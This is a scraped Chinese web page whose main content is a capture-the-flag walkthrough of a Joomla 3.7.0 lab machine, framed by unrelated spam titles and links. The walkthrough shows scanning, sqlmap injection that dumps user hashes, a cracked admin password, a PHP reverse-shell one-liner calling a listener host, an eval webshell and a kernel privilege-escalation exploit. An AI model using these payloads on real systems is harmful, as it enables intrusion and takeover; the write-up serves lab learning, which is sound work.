当前位置: 首页 > news >正文

厦门网站做的比较好手机网站建设一般多少钱

厦门网站做的比较好,手机网站建设一般多少钱,哈尔滨站建好了吗,汕头cms模板建站1. 靶机介绍 主要的内容有 sql 注入漏洞、joomla 框架漏洞、ssh 攻击、shell 反弹、提权 信息收集(ip、端口、目录、指纹信息)---利用漏洞---反弹----提权 2. 信息收集 2.1. 扫描存活 ip 192.168.220.134 2.2. 端口扫描 nmap -T4 -A -p- 192.168.220.134 …1. 靶机介绍 主要的内容有 sql 注入漏洞、joomla 框架漏洞、ssh 攻击、shell 反弹、提权 信息收集(ip、端口、目录、指纹信息)---利用漏洞---反弹----提权 2. 信息收集 2.1. 扫描存活 ip 192.168.220.134 2.2. 端口扫描 nmap -T4  -A  -p-  192.168.220.134 通过对端口扫描发现对外开放了 80 端口然后进行访问 还发现了当前主机的 CMS 是 Joomla 2.3. 敏感目录扫描 nikto  -h  192.168.220.134 administrator/index.php 通过对敏感目录扫描可以发现后台管理的登录页面尝试访问 2.4. 通过 joomscan 扫描相关的漏洞 ​ joomscan  --url  http://192.168.220.134​ 2.5. 扫描 joomla存在的漏洞 searchsploit Joomla 3.7.0 结合漏洞的文件名叫 42033.txt查找这个文件所在的具体位置 find / -name  42033.txt 查看文件的内容 cat  /usr/share/exploitdb/exploits/php/webapps/42033.txt 3.漏洞利用 3.1. sql 注入漏洞 sqlmap -u http://localhost/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml --risk3 --level5 --random-agent --dbs -p list[fullordering] 利用提供的 sqlmap 进行数据库爆破 sqlmap -u http://192.168.220.134/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml --risk3 --level5 --random-agent --dbs -p list[fullordering] sqlmap -u http://192.168.220.134/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml --risk3 --level5 --random-agent -D joomladb --tables -p list[fullordering] sqlmap -u http://192.168.220.134/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml --risk3 --level5 --random-agent -D joomladb -T  #__users   --columns -p list[fullordering] sqlmap -u http://192.168.220.134/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml --risk3 --level5 --random-agent -D joomladb -T  #__users   -C name,password   --dump -p list[fullordering] $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu 此时获取到账号和密码但是密码被加密了 可以通过 kali 内置的 john 工具进行解密首先需要将密文保存在一个 txt 文件中 vim jop.txt john --show  jop.txt 得到密码是snoopy 用户名admin 登录 3.2. shell 反弹 可以发现这个区域能够写入 php 代码此时可以联想1.可以写一句话木马然后通过蚁剑连接2.进行 shell 反弹此时我们可以先新建一个 shell.php 文件然后写入反弹的 shell ?php system(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 21|nc 192.168.126.138 6666 /tmp/f);? 在 kali 中开启 nc 监听 nc -lvp 6666 接下来需要访问 shell.php 文件 http://192.168.220.134/templates/beez3/shell.php 使用 python 脚本设置命令行 python -c import pty;pty.spawn(/bin/bash) 接下来尝试使用用户提权发现行不通 sudo  -l 可以尝试使用操作系统提权方式,先查看操作系统的版本信息 cat  /etc/issue 3.3. 发现操作系统的漏洞 接下来搜索操作系统的漏洞 searchsploit   Ubuntu 16.04 Privilege Escalation 权限升级 searchsploit -p linux/local/39772.txtcat /usr/share/exploitdb/exploits/linux/local/39772.txt 3.4. 利用操作系统漏洞 需要通过这个 39772.zip 这个压缩包来进行提权 在本地下载这个文件然后通过蚁剑进行上传 首先先需要创建一个 one.php 文件并写入一句话木马 ?php  eval($_POST[123])? 需要访问这个 one.php让木马生效 接下来使用蚁剑来进行连接 进入服务器内容进行压缩包的解压 cd 39772lstar -xvf exploit.tar 3.5. 利用工具进行提权 进入目录并执行文件最后提权成功 cd ebpf_mapfd_doubleput_exploit./compile.sh./doubleput 3.6. 找到最终的 flag 进入/root 目录最终进行提权 cd  /rootcat  the-flag.txt
http://www.pierceye.com/news/434280/

相关文章:

  • 长沙设备建站按效果付费wordpress可视化编辑器插件
  • 软件开发与网站开发硬件开发语言
  • 开封做网站睿艺美官方网站建设的必要
  • 自适应网站制作简创网络南联网站建设
  • 帮别人做钓鱼网站犯法吗贵州网站建设工作室
  • 企业网站域名空间优化公司治理结构
  • 网站建设 前沿文章php做网站脑图
  • 刷单网站开发装修企业网站源码
  • 莱州人社局网站网站开发项目资金运用明细
  • 水墨网站模板软通动力外包怎么样
  • 直播间网站建设小清新wordpress主题
  • 淘金网站建设推广汽车 营销 网站建设
  • 网站站内链接seo外链发布工具
  • 如何设计大型电商网站建设利用php做网站
  • 大朗网站仿做google广告
  • 跳转网站代码wordpress文章只能会员才能看
  • 大鹏网络网站建设报价vps的网站打不开
  • 西部数码网站管理助手卸载修改网站空间服务器密码
  • asp网站开发技术总结与收获建设银行网站怎么登录密码忘了怎么办
  • 营销型企业网站 网络服务flashfxp 网站
  • 青岛网站建设服务平台邢台专业网站建设费用
  • wordpress做网站好吗戴南做网站
  • 中山精品网站建设价位网站开发后台一般用什么
  • 万网 手机网站物联网平台介绍
  • 墨星写作网站网站建设使用的什么语言
  • wdcp网站搬家wordpress 改成宽屏
  • 汽车网站建设规划书洛阳恢复客运最新通知
  • 商洛建设网站有了网站源码可以做网站吗
  • 网站运营学习电子商务网站建设与管理的实验报告
  • 上海设计网站与太原免费网络推广哪里朿